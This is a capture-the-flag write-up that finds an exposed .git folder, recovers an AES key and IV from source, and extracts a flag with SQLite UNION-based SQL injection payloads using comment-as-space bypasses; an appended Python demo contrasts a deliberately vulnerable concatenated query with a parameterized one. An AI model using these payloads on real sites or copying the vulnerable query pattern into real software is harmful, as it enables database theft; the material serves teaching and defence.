In this challenge, we have a form.

Submitting the input 1 returns a base64 string.

But we get nothing when decoding it, so I guess it is encrypted.

I tried dirsearch and found ‘.git’:

Then we use GitHack to get the source code. In the folder ‘form’, we found the file AES.py.


Now we have the key and IV, and use them to decrypt the string:

Try SQL injection with:

1/**/or/**/1=1--

Therefore, I think that all the responses will be encrypted. Decrypting those strings, we have 5 country names: Vietnam, England, Japan, America, France.

Looking for database information, we found that it is SQLite version 3.27.2 with:

1/**/union/**/select/**/null,sqlite_version()--

Now, we use:

1/**/union/**/select/**/null,name/**/from/**/sqlite_master/**/where/**/type='table'--
1/**/union/**/select/**/null,sql/**/from/**/sqlite_master/**/where/**/type='table'/**/and/**/tbl_name='form_flag'--

We found a table named ‘form_flag’ and a column named ‘flag’. Use this payload to get the flag and decrypt it:

1/**/union/**/select/**/null,flag/**/from/**/form_flag--

Flag: FUSEC{CSGO://Bomb_has_been_exploded_CT_loose}
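The payloads above work because the form input ends up inside the SQL text itself. The following is an added example, not the challenge's source code: it runs the same payloads against a concatenated SQLite query and a parameterized one. The form_country table, its columns, the function names and the placeholder flag value are assumptions; only form_flag(flag) comes from the write-up.

```python
import sqlite3


def build_db():
    # Constructed in-memory database. form_country and its columns are
    # assumptions; form_flag(flag) is the table recovered in the write-up.
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE form_country (id INTEGER PRIMARY KEY, name TEXT);
        CREATE TABLE form_flag (id INTEGER PRIMARY KEY, flag TEXT);
        INSERT INTO form_country (name) VALUES
            ('Vietnam'), ('England'), ('Japan'), ('America'), ('France');
        INSERT INTO form_flag (flag) VALUES ('PLACEHOLDER_FLAG');
    """)
    return db


def lookup_vulnerable(db, user_input):
    # The input is concatenated into the statement, so SQLite parses it as SQL.
    query = "SELECT id, name FROM form_country WHERE id = " + user_input
    return [row[1] for row in db.execute(query)]


def lookup_parameterized(db, user_input):
    # The input is bound as a value; any SQL syntax inside it stays plain data.
    query = "SELECT id, name FROM form_country WHERE id = ?"
    return [row[1] for row in db.execute(query, (user_input,))]


if __name__ == "__main__":
    db = build_db()
    payloads = [
        "1",
        "1/**/or/**/1=1--",
        "1/**/union/**/select/**/null,flag/**/from/**/form_flag--",
    ]
    for p in payloads:
        print(repr(p))
        print("  concatenated :", lookup_vulnerable(db, p))
        print("  parameterized:", lookup_parameterized(db, p))
```

With the bound parameter, only the literal id 1 matches a row, and both injection strings return nothing.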
By Dang Kien
